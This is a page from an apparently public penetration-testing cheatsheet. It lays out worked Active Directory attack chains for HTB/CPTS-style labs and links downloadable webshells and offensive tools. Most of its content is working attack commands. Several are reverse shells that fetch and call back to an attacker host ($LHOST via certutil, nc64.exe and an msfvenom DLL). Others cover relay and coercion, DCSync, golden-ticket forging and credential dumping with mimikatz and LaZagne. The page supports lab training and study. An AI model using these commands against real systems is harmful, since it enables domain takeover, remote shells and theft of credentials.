daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

worked-chains.md (26106B)


      1 ---
      2 title: "Appendix — Worked Chains"
      3 description: "CPTS attack-flow reference for appendix — worked chains in an authorised engagement."
      4 category: pentest-workflow
      5 subcategory: "CPTS Attack Flow"
      6 order: 16
      7 tags: ["htb", "cpts", "htb-attack-flow", "htb-attack-flow-appendix", "pentest-workflow"]
      8 tools: ["NetExec", "Impacket", "BloodHound CE", "Certipy", "Rubeus", "Responder", "bloodyAD", "mimikatz"]
      9 difficulty: advanced
     10 updated: "2026-08-29"
     11 source: "vault:Pentest Attack Flow/16 - Appendix - Worked Chains.md"
     12 ---
     13 > [!dashboard] Attack-flow navigation
     14 > **Dashboard:** [HTB Pentest Attack Flow](/sheets/pentest-workflow/attack-flow-dashboard)
     15 >
     16 > **Section:** 16 of 17 · **Focus:** Appendix — Worked Chains
     17 >
     18 > **Previous:** [Stage 11 — Documentation and Reporting](/sheets/pentest-workflow/documentation-and-reporting) · **Next:** [Tool Index](/sheets/pentest-workflow/tool-index)
     19 
     20 ---
     21 # 🧬 APPENDIX — Worked Chains (real boxes, stage-mapped)
     22 
     23 The guide is organised by technique; this is the other axis — how the techniques *compose* on real boxes. Each chain is annotated with the guide's stages `[S#]` so you can see the pattern and jump to the deep section. Pattern-recognition beats memorising commands: most AD boxes are **enum → a foothold cred → BloodHound → one ACL/roast edge → DCSync**.
     24 
     25 Stage map: `[S0]`=[Passive Recon](/sheets/pentest-workflow/passive-external-recon) · `[S1]`=[Host Discovery](/sheets/pentest-workflow/recon-and-host-discovery) · `[S2]`=[Web](/sheets/pentest-workflow/web-enumeration-and-exploitation) · `[S3]`=[Service Enum](/sheets/pentest-workflow/service-enumeration) · `[S4]`=[AD Enum](/sheets/pentest-workflow/active-directory-enumeration) · `[S5]`=[Kerberos](/sheets/pentest-workflow/kerberos-attacks) · `[S6]`=[ACL Abuse](/sheets/pentest-workflow/acl-and-object-abuse) · `[S7]`=[ADCS](/sheets/pentest-workflow/adcs-and-certificate-abuse) · `[S8]`=[Passwords](/sheets/pentest-workflow/password-attacks-and-credential-hunting) · `[S9]`=[PrivEsc](/sheets/pentest-workflow/privilege-escalation) · `[S10]`=[Lateral/Loot](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) · Trusts=[Cross-Forest](/sheets/pentest-workflow/domain-trusts-and-cross-forest).
     26 
     27 > [!tip] The universal AD shape
     28 > `[S1]` scan → `[S3/S4]` null/anon enum for users+shares → a **first credential** (share loot, AS-REP roast, password in a description, a poisoned hash) → `[S4]` BloodHound *as that user* → `[S5/S6/S7]` the one edge that escalates (roast / ACL / delegation / ESC) → `[S10]` DCSync + PtH the Administrator. Every new cred = re-run BloodHound.
     29 
     30 <figure class="flow plate corners">
     31   <figcaption class="flow__cap"><span class="flow__kind">Universal AD chain</span><span class="flow__dir">TD</span></figcaption>
     32   <div class="flow__body">
     33     <div class="flow__diagram" data-dir="td">
     34       <div class="flow-rank"><div class="flow-node is-entry">Web foothold</div></div>
     35       <div class="flow-edge"></div>
     36       <div class="flow-rank"><div class="flow-node">Local privesc</div></div>
     37       <div class="flow-edge"></div>
     38       <div class="flow-rank"><div class="flow-node">AD enum + BloodHound</div></div>
     39       <div class="flow-branches">
     40         <div class="flow-lane"><div class="flow-edge"></div><div class="flow-node">Kerberoast</div></div>
     41         <div class="flow-lane"><div class="flow-edge"></div><div class="flow-node">ACL edge</div></div>
     42         <div class="flow-lane"><div class="flow-edge"></div><div class="flow-node">ADCS ESC</div></div>
     43         <div class="flow-lane"><div class="flow-edge"></div><div class="flow-node">Relay / RBCD</div></div>
     44       </div>
     45       <div class="flow-join"></div>
     46       <div class="flow-rank"><div class="flow-node is-goal">DCSync / DA</div></div>
     47       <div class="flow-edge"></div>
     48       <div class="flow-rank"><div class="flow-node">Cross-forest via trusts</div></div>
     49     </div>
     50   </div>
     51 </figure>
     52 
     53 > [!warning] Authorized lab use
     54 > All chains below assume an authorized HTB/CPTS-style lab. Every AD write (ACEs, SPNs, RBCD, shadow creds) is reversible — record what you change and revert it ([Stage 06 OPSEC](/sheets/pentest-workflow/acl-and-object-abuse)).
     55 
     56 ---
     57 
     58 ## Chain A — External web → foothold → privesc → DA (kerberoast + ESC8)
     59 
     60 The classic CPTS capstone shape: internet-facing web app on a domain-joined host, then the full internal AD grind. MITRE: T1190 (Exploit Public-Facing Application) → T1558.003 (Kerberoasting) → T1649 (ESC8).
     61 
     62 1. **`[S0/S1]` Recon.** Subdomains, ports, vhosts:
     63    ```bash
     64    nmap -sCV -p- --min-rate 2000 -oA full $IP
     65    ffuf -u http://$TARGET -H "Host: FUZZ.$TARGET" -w $SECLISTS/Discovery/DNS/subdomains-top1million-5000.txt
     66    ```
     67 2. **`[S2]` Web → RCE.** Enumerate the app (ffuf dirs, tech fingerprint, known CVE). Upload a webshell matched to the stack — stage from the toolkit: [nt-webshell-rosepine.aspx](/downloads/pentest-workflow/nt-webshell-rosepine.aspx) ([SHA-256](/downloads/pentest-workflow/nt-webshell-rosepine.aspx.sha256) · [GPG signature](/downloads/pentest-workflow/nt-webshell-rosepine.aspx.sha256.asc)) for IIS, [rp-shell.php](/downloads/pentest-workflow/rp-shell.php) ([SHA-256](/downloads/pentest-workflow/rp-shell.php.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.php.sha256.asc)) for PHP, [rp-shell.jsp](/downloads/pentest-workflow/rp-shell.jsp) ([SHA-256](/downloads/pentest-workflow/rp-shell.jsp.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.jsp.sha256.asc)) for Tomcat (classic ASP: [rp-shell.asp](/downloads/pentest-workflow/rp-shell.asp) ([SHA-256](/downloads/pentest-workflow/rp-shell.asp.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.asp.sha256.asc))).
     68    ```powershell
     69    certutil -urlcache -split -f http://$LHOST:8000/nc64.exe C:\Windows\Temp\nc64.exe
     70    C:\Windows\Temp\nc64.exe $LHOST 443 -e cmd.exe
     71    ```
     72    Toolkit: [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc))
     73 3. **`[S9]` Local privesc** (if the shell lands as a service account — often `iis apppool\...` with **SeImpersonatePrivilege**):
     74    ```powershell
     75    .\GodPotato-NET4.exe -cmd "C:\Windows\Temp\nc64.exe $LHOST 444 -e cmd.exe"
     76    ```
     77    Toolkit: [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) (or `GodPotato-NET35.exe`, `PrintSpoofer64.exe`, `SweetPotato.exe` — pick per OS build/Spooler state; see [Stage 09](/sheets/pentest-workflow/privilege-escalation)).
     78 4. **`[S4]` BloodHound as the foothold user/machine:**
     79    ```bash
     80    bloodhound-ce-python -d $DOMAIN -u "$U" -p "$P" -ns $DCIP -c All --zip
     81    ```
     82    On-host alternative: [SharpHound.zip](/downloads/pentest-workflow/SharpHound.zip) ([SHA-256](/downloads/pentest-workflow/SharpHound.zip.sha256) · [GPG signature](/downloads/pentest-workflow/SharpHound.zip.sha256.asc))
     83 5. **`[S5]` Kerberoast** an SPN account visible in the graph:
     84    ```bash
     85    GetUserSPNs.py "$DOMAIN/$U:$P" -dc-ip $DCIP -request -outputfile kerb.hash
     86    hashcat -m 13100 kerb.hash $ROCKYOU -r /usr/share/hashcat/rules/best64.rule
     87    ```
     88    Deep dive: [Stage 05](/sheets/pentest-workflow/kerberos-attacks).
     89 6. **`[S7]` The cracked service account can reach AD CS.** Find and exploit ESC8 (web enrollment + no EPA):
     90    ```bash
     91    certipy-ad find -u "$U@$DOMAIN" -p "$P" -dc-ip $DCIP -vulnerable -stdout
     92    ntlmrelayx.py -t http://ca.$DOMAIN/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
     93    PetitPotam.py -u "$U" -p "$P" -d $DOMAIN $LHOST $DCIP    # coerce DC auth to the relay
     94    ```
     95    Toolkit: [PetitPotam.py](/downloads/pentest-workflow/PetitPotam.py) ([SHA-256](/downloads/pentest-workflow/PetitPotam.py.sha256) · [GPG signature](/downloads/pentest-workflow/PetitPotam.py.sha256.asc)) · certipy: [Certipy](https://github.com/ly4k/Certipy) · relay: [Impacket ntlmrelayx](https://github.com/fortra/impacket).
     96 7. **`[S10]` Use the relayed DC cert → DCSync:** the relay already dropped `DC01$.pfx` — no manual `req` needed (the DomainController template has no enrollee-supplies-subject anyway):
     97    ```bash
     98    certipy-ad auth -pfx 'DC01$.pfx' -dc-ip $DCIP       # -> DC01$ NT hash (+TGT)
     99    secretsdump.py "$DOMAIN/DC01\$@$DC" -hashes :$NT -just-dc   # DCSync as the DC itself
    100    ```
    101 8. **Document & revert.** Capture proof (`secretsdump` output, cert request IDs), remove the webshell and staged binaries, log ESC8 remediation ([Stage 11](/sheets/pentest-workflow/documentation-and-reporting)).
    102 
    103 > [!example] When to reach for this chain
    104 > Any box where the only ingress is 80/443 and the DC is not directly reachable. The web foothold host *is* your pivot into `[S4]`.
    105 
    106 > [!opsec] Detection notes
    107 > Webshells (T1505.003) are the #1 caught artifact — use a random name, delete after. Coercion + relay (T1187, T1557.001) fires Defender for Identity and creates Event 4768/4769 anomalies. ESC8 cert requests appear on the CA — note request IDs for cleanup.
    108 
    109 ---
    110 
    111 ## Chain B — ASREPRoast → GenericWrite → targeted kerberoast → DCSync
    112 
    113 No creds needed to start; pure identity attacks. MITRE: T1558.004 (AS-REP Roasting) → T1558.003 → T1003.006 (DCSync).
    114 
    115 1. **`[S4]` Build a user list** without creds:
    116    ```bash
    117    kerbrute userenum --dc $DCIP -d $DOMAIN $SECLISTS/Usernames/xato-net-10-million-usernames.txt
    118    enum4linux-ng -A $IP | tee enum.txt     # or rpcclient -U "" -N → enumdomusers
    119    ```
    120    Toolkit: [kerbrute_linux_amd64](/downloads/pentest-workflow/kerbrute_linux_amd64) ([SHA-256](/downloads/pentest-workflow/kerbrute_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/kerbrute_linux_amd64.sha256.asc))
    121 2. **`[S5]` AS-REP roast** the list ([Stage 05](/sheets/pentest-workflow/kerberos-attacks)):
    122    ```bash
    123    GetNPUsers.py $DOMAIN/ -usersfile users.txt -no-pass -dc-ip $DCIP -outputfile asrep.hash
    124    hashcat -m 18200 asrep.hash $ROCKYOU
    125    ```
    126 3. **`[S4]` BloodHound as the cracked user** (`bloodhound-ce-python -c All`) — the graph shows **GenericWrite** on a privileged service account (e.g. `svc_sql`).
    127 4. **`[S6]` Targeted kerberoast** — write an SPN onto the victim, roast it, clean up:
    128    ```bash
    129    targetedKerberoast.py -d $DOMAIN -u "$U" -p "$P" --request-user svc_sql -o targeted.hash
    130    hashcat -m 13100 targeted.hash $ROCKYOU
    131    ```
    132    Toolkit: [targetedKerberoast.py](/downloads/pentest-workflow/targetedKerberoast.py) ([SHA-256](/downloads/pentest-workflow/targetedKerberoast.py.sha256) · [GPG signature](/downloads/pentest-workflow/targetedKerberoast.py.sha256.asc)) — it removes the SPN afterwards; verify anyway (`Get-ADUser svc_sql -Properties servicePrincipalName`).
    133 5. **`[S6]` The cracked svc_sql has GenericAll/WriteDACL on a DA-path group** (or the domain root). Add DCSync rights:
    134    ```bash
    135    bloodyAD --host $DCIP -d $DOMAIN -u "$U" -p "$P" add dcsync svc_sql
    136    # or: dacledit.py -action write -rights DCSync -principal svc_sql -target-dn "DC=corp,DC=local" "$DOMAIN/$U:$P" -dc-ip $DCIP
    137    ```
    138    On-host equivalent: [StandIn_v13_Net35_45.zip](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip) ([SHA-256](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip.sha256) · [GPG signature](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip.sha256.asc))
    139 6. **`[S10]` DCSync and PtH:**
    140    ```bash
    141    secretsdump.py "$DOMAIN/svc_sql:$P@$DC" -just-dc-user administrator
    142    evil-winrm -i $DCIP -u administrator -H $NT
    143    ```
    144 7. **Revert:** remove the DCSync ACE (`bloodyAD remove dcsync svc_sql`), confirm the SPN cleanup, log it.
    145 
    146 > [!warning] Pitfalls
    147 > - AS-REP hash mode is **18200**, not 13100 — read the `$krb5asrep$` prefix.
    148 > - GenericWrite ≠ instant roast: you need the SPN write (targetedKerberoast) or shadow credentials (`pywhisker` / [Whisker.exe](/downloads/pentest-workflow/Whisker.exe) ([SHA-256](/downloads/pentest-workflow/Whisker.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Whisker.exe.sha256.asc))).
    149 > - `WriteDACL` on the domain root → DCSync; on a user → targeted roast/shadow creds; on a group → add member. Pick per object type.
    150 
    151 ---
    152 
    153 ## Chain C — No creds at all: LLMNR poison → relay → LDAP → RBCD
    154 
    155 For flat networks where SMB signing is off and LDAP signing/channel binding aren't enforced. MITRE: T1557.001 (LLMNR/NBT-NS Poisoning) → T1003.006 via delegation abuse.
    156 
    157 1. **`[S3]` Poison and capture** ([Stage 03](/sheets/pentest-workflow/service-enumeration)):
    158    ```bash
    159    sudo responder -I eth0 -dwv
    160    # Windows-side when already on a host: Inveigh
    161    ```
    162    Toolkit: [Inveigh.ps1](/downloads/pentest-workflow/Inveigh.ps1) ([SHA-256](/downloads/pentest-workflow/Inveigh.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/Inveigh.ps1.sha256.asc)) (`Invoke-Inveigh -ConsoleOutput Y`).
    163 2. **Crack any NetNTLMv2 that drops** (`hashcat -m 5600`) — even one weak user unlocks `[S4]` BloodHound.
    164 3. **`[S3]` Relay instead of crack** — check signing first:
    165    ```bash
    166    nxc smb $SUBNET --gen-relay-list relay.txt     # hosts with signing disabled
    167    ```
    168 4. **Relay to LDAP(S) → configure RBCD.** Start `ntlmrelayx` and drop a controlled machine account ([Stage 06](/sheets/pentest-workflow/acl-and-object-abuse)):
    169    ```bash
    170    ntlmrelayx.py -t ldap://$DCIP -smb2support --delegate-access --escalate-user 'EVILPC$' -l loot
    171    addcomputer.py -computer-name 'EVILPC$' -computer-pass 'Ev1lPass!' "$DOMAIN/$U:$P" -dc-ip $DCIP  # if MAQ>0 and no relay create
    172    ```
    173    Trigger a lookup (`responder -I eth0` + browse, or coerce with [PetitPotam](https://github.com/topotam/PetitPotam)/[Coercer](https://github.com/p0dalirius/Coercer)) and the victim machine's `msDS-AllowedToActOnBehalfOfOtherIdentity` now trusts `EVILPC$`.
    174 5. **`[S5]` S4U2Self → S4U2Proxy** — impersonate Administrator to the victim:
    175    ```bash
    176    getST.py "$DOMAIN/EVILPC$:Ev1lPass!" -spn cifs/victim.$DOMAIN -impersonate administrator -dc-ip $DCIP
    177    export KRB5CCNAME=administrator@cifs_victim.$DOMAIN@$DOMAIN.ccache
    178    psexec.py -k -no-pass victim.$DOMAIN
    179    ```
    180 6. **`[S10]` Loot & pivot**: `secretsdump.py -k` the victim, pivot onward with ligolo-ng — [ligolo-ng_agent_linux_amd64.tar.gz](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz) ([SHA-256](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz.sha256) · [GPG signature](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz.sha256.asc)) / [ligolo-ng_agent_windows_amd64.zip](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip) ([SHA-256](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip.sha256) · [GPG signature](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip.sha256.asc)) + [chisel.exe](/downloads/pentest-workflow/chisel.exe) ([SHA-256](/downloads/pentest-workflow/chisel.exe.sha256) · [GPG signature](/downloads/pentest-workflow/chisel.exe.sha256.asc)) / [chisel_linux_amd64](/downloads/pentest-workflow/chisel_linux_amd64) ([SHA-256](/downloads/pentest-workflow/chisel_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/chisel_linux_amd64.sha256.asc)).
    181 
    182 > [!opsec] Relay caveats
    183 > Relaying is loud: LLMNR/NBT-NS broadcasts + auth coercion are textbook Defender for Identity / honeypot bait (T1557.001). Never relay to a DC unless the engagement says so; never disable the Spooler service as a "fix" on a production box. LDAP relay requires LDAP signing off *and* (for LDAPS) channel binding off — check with `nxc ldap $DCIP -u '' -p '' -M ldap-checker` style modules before burning time.
    184 
    185 ---
    186 
    187 ## Chain D — DA in child domain → forest root → cross-forest (SID history)
    188 
    189 The trusts capstone. MITRE: T1134 (SID-History Injection), T1550.003 (PtT). Deep dive: [Domain Trusts and Cross-Forest](/sheets/pentest-workflow/domain-trusts-and-cross-forest).
    190 
    191 1. **Map the trust topology** (on-host: `nltest /domain_trusts`, or PowerView `Get-DomainTrust` — [PowerView.ps1](/downloads/pentest-workflow/PowerView.ps1) ([SHA-256](/downloads/pentest-workflow/PowerView.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/PowerView.ps1.sha256.asc))):
    192    ```bash
    193    ldeep ldap -u "$U" -p "$P" -d child.$DOMAIN -s ldap://$DCIP trusts
    194    ```
    195 2. **Child → parent (intra-forest).** Trust key → golden ticket with SID history (Enterprise Admins RID 519):
    196    ```bash
    197    lookupsid.py "$DOMAIN/$U:$P@$DCIP" | head -3     # child domain SID
    198    secretsdump.py child/administrator@child-dc.child.$DOMAIN -just-dc-user 'CHILD\krbtgt' -hashes :$NT
    199    ticketer.py -nthash <KRBTGT_NT> -domain child.$DOMAIN -domain-sid S-1-5-21-... -extra-sid S-1-5-21-<PARENT>-519 administrator
    200    raiseChild.py child.$DOMAIN/$U:"$P"     # one-shot alternative
    201    export KRB5CCNAME=administrator.ccache
    202    secretsdump.py -k parent.$DOMAIN/administrator@parent-dc.parent.$DOMAIN -just-dc
    203    ```
    204 3. **Forest → trusting forest (external/forest trust).** From DA in forest A, dump the **trust account hash** for forest B:
    205    ```bash
    206    mimikatz.exe "lsadump::trust /patch" "exit"
    207    # or: secretsdump.py ... (trust accounts end in '$', e.g. TRUSTEDDOM$)
    208    ticketer.py -nthash <TRUST_NT> -domain forest-a.local -domain-sid S-1-5-21-A -extra-sid S-1-5-21-B-519 administrator
    209    ```
    210    Toolkit: [mimikatz_trunk.zip](/downloads/pentest-workflow/mimikatz_trunk.zip) ([SHA-256](/downloads/pentest-workflow/mimikatz_trunk.zip.sha256) · [GPG signature](/downloads/pentest-workflow/mimikatz_trunk.zip.sha256.asc))
    211 4. **`[S10]` Consume the ticket** in the trusting forest: `KRB5CCNAME=... secretsdump.py -k admin@dc.forest-b.local -just-dc`.
    212 
    213 > [!warning] Gotchas
    214 > - **SID filtering** on external trusts strips SIDs <1000 from *other* forests — but intra-forest (parent↔child) never filters, which is why child→root always works. Extra SID `-519` (Enterprise Admins) for intra-forest; for cross-forest you may be limited to RIDs ≥1000 — inject a known admin group RID from forest B instead.
    215 > - RC4 trust keys are the norm; if `KDC_ERR_ETYPE_NOSUPP`, use AES (`-aesKey`).
    216 > - Trust tickets are time-sensitive — `faketime`/ntpdate first ([Dashboard Quick Setup](/sheets/pentest-workflow/attack-flow-dashboard)).
    217 
    218 ---
    219 ## Chain E — MSSQL links → xp_cmdshell → SeImpersonate → SYSTEM
    220 
    221 SQL Server is a privilege-escalation engine when links and `sysadmin` line up. MITRE: T1505.001 (SQL Stored Procedures) → T1134 (Token Impersonation).
    222 
    223 1. **`[S3]` Find MSSQL and authenticate** (creds from spray/roast/loot):
    224    ```bash
    225    nxc mssql $SUBNET -u "$U" -p "$P" --local-auth
    226    mssqlclient.py "$DOMAIN/$U:$P@$IP" -windows-auth
    227    ```
    228 2. **Enable `xp_cmdshell` for a command channel:**
    229    ```sql
    230    EXEC sp_configure 'show advanced options',1; RECONFIGURE;
    231    EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;
    232    EXEC xp_cmdshell 'whoami';
    233    ```
    234    Or directly from nxc: `nxc mssql $IP -u "$U" -p "$P" --local-auth -x whoami`.
    235 3. **Enumerate linked servers and impersonate along the chain:**
    236    ```sql
    237    EXEC sp_linkedservers;
    238    SELECT IS_SRVROLEMEMBER('sysadmin');
    239    EXEC ('EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE') AT LINKED02;
    240    EXEC ('EXEC xp_cmdshell ''whoami''') AT LINKED02;
    241    ```
    242    nxc shortcut: `nxc mssql $IP -u "$U" -p "$P" -M mssql_priv` (finds impersonation paths). Each hop may re-authenticate as a more privileged login — walk links until you land `sysadmin` on a high-value box. Metasploit's `mssql_linkcrawler` automates the crawl.
    243 4. **`[S9]` SeImpersonate → SYSTEM.** SQL service accounts (`nt service\mssqlserver`) almost always hold SeImpersonatePrivilege:
    244    ```powershell
    245    .\GodPotato-NET4.exe -cmd "net localgroup administrators $U /add"
    246    ```
    247    Toolkit: [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) — fallbacks: [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc)) (needs Spooler running), [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)), legacy [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc)) on pre-2019 builds.
    248 5. **`[S10]` Loot the host**: dump local creds with [LaZagne.exe](/downloads/pentest-workflow/LaZagne.exe) ([SHA-256](/downloads/pentest-workflow/LaZagne.exe.sha256) · [GPG signature](/downloads/pentest-workflow/LaZagne.exe.sha256.asc)), DPAPI blobs with [SharpDPAPI.exe](/downloads/pentest-workflow/SharpDPAPI.exe) ([SHA-256](/downloads/pentest-workflow/SharpDPAPI.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpDPAPI.exe.sha256.asc)), then hunt domain shares with [Snaffler.exe](/downloads/pentest-workflow/Snaffler.exe) ([SHA-256](/downloads/pentest-workflow/Snaffler.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Snaffler.exe.sha256.asc)) — SQL boxes often hold connection strings with cleartext domain creds, feeding you back to `[S4]`.
    249 
    250 > [!tip] CPTS exam tip
    251 > MSSQL on 1433 with weak/linked creds is a favourite CPTS escalation. Always check `sp_linkedservers` and impersonation *before* reaching for kernel exploits — the intended path is usually one `EXEC ... AT LINK` away.
    252 
    253 ---
    254 
    255 ## Chain F — HTB box patterns (Forest · Resolute · Fluffy)
    256 
    257 ### Forest — AS-REP → Exchange-perms WriteDACL → DCSync
    258 1. `[S3]` RPC/LDAP null session lists domain users (`rpcclient -U "" -N` → `enumdomusers`).
    259 2. `[S5]` **svc-alfresco** has no Kerberos preauth → AS-REP roast (`GetNPUsers.py -no-pass`) → crack (`hashcat -m 18200` against `$ROCKYOU`).
    260 3. `[S4]` BloodHound as svc-alfresco: it's in **Account Operators** + **Exchange Windows Permissions** (WriteDACL on the domain root).
    261 4. `[S6]` grant self DCSync (`dacledit.py -action write -rights DCSync` / `bloodyAD add dcsync`).
    262 5. `[S10]` `secretsdump.py -just-dc` → PtH Administrator (`evil-winrm -H $NT`).
    263 Note: HTB-Forest.
    264 
    265 ### Resolute — password in a description → spray → DnsAdmins DLL → SYSTEM
    266 1. `[S4]` LDAP/RPC enum surfaces a cleartext password in a user **description** field (`Welcome123!`) — always grep descriptions and `info` fields ([Stage 04](/sheets/pentest-workflow/active-directory-enumeration)).
    267 2. `[S8]` spray it across all users (`nxc smb $DCIP -u users.txt -p 'Welcome123!' --continue-on-success`) → hits **melanie** ([Stage 08](/sheets/pentest-workflow/password-attacks-and-credential-hunting)).
    268 3. `[S10]` WinRM in (`evil-winrm -u melanie -p ...`) → hunt the host, find creds for **ryan** (registry `AutoLogon`, console history).
    269 4. ryan is in **DnsAdmins** → `[S9]` load a malicious DLL into the DNS service:
    270    ```cmd
    271    msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=443 -f dll > rev.dll
    272    dnscmd $DC /config /serverlevelplugindll \\$LHOST\smb\rev.dll
    273    sc \\$DC stop dns && sc \\$DC start dns
    274    ```
    275    → SYSTEM on the DC. Note: Resolute.
    276 
    277 ### Fluffy — file-format NTLM capture → Shadow Creds → ADCS
    278 1. `[S3]` writable SMB share → drop a malicious `.library-ms` (CVE-2025-24071) so opening the share coerces NTLM auth → capture with [Responder](https://github.com/lgandx/Responder).
    279 2. `[S8]` crack **j.fleischman** (`hashcat -m 5600`).
    280 3. `[S4]` BloodHound: **GenericWrite** onto service accounts.
    281 4. `[S6]` Shadow Credentials (`bloodyAD add shadowCredentials` / [pywhisker](https://github.com/ShutdownRepo/pywhisker)) to take **winrm_svc**, then again onto **ca_svc**. On-host equivalent: [Whisker.exe](/downloads/pentest-workflow/Whisker.exe) ([SHA-256](/downloads/pentest-workflow/Whisker.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Whisker.exe.sha256.asc)).
    282 5. `[S7]` ca_svc can enroll a vulnerable template → ADCS ESC (`certipy-ad find -vulnerable` → `req` → `auth`) → auth as DA → `[S10]` own the domain.
    283 Notes: HTB-Fluffy · Fluffy Attack Plan.
    284 
    285 ### The web-to-AD pattern (many CPTS/AEN boxes)
    286 `[S0/S2]` external recon + web enum finds an app → `[S2]` an app-specific exploit (upload/LFI/known-CVE/thick-client creds) → foothold shell on a domain-joined host → `[S9]` local privesc if needed → `[S4]` you're now inside AD: BloodHound + LDAP cookbook as the machine/user → follow the AD shape above. The [**Attacking Enterprise Networks**](/sheets/pentest-workflow/htb-attack-flow-playbook) capstone is exactly this, end to end — see that sheet for the full INLANEFREIGHT chain written out command by command. Chain A above is this pattern written out step by step.
    287 
    288 > [!note] More box notes to mine for patterns
    289 > Garfield (Season 10), the Pro-Lab chains (Dante, Zephyr), and the AD Track. Same shape scaled up: multiple hosts, pivots between segments ([Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot)), and trusts ([Cross-Forest](/sheets/pentest-workflow/domain-trusts-and-cross-forest)) once you're DA in the first domain.
    290 
    291 > [!example] Pattern-recognition cheat table
    292 > | Box | First cred | Escalation edge | DA via |
    293 > |---|---|---|---|
    294 > | Forest | AS-REP roast (svc-alfresco) | Exchange WriteDACL on domain | DCSync |
    295 > | Resolute | Description-field password → spray | DnsAdmins | Malicious DNS plugin DLL |
    296 > | Fluffy | NTLM capture via .library-ms | GenericWrite → Shadow Creds | ADCS ESC enroll |
    297 > | Typical CPTS | Share loot / kerberoast | One ACL or ESC edge | DCSync + PtH |
    298 
    299 ---
    300 
    301 > [!navigation] Continue the attack flow
    302 > **Previous:** [Stage 11 — Documentation and Reporting](/sheets/pentest-workflow/documentation-and-reporting)
    303 >
    304 > **Dashboard:** [HTB Pentest Attack Flow](/sheets/pentest-workflow/attack-flow-dashboard)
    305 >
    306 > **Next:** [Tool Index](/sheets/pentest-workflow/tool-index)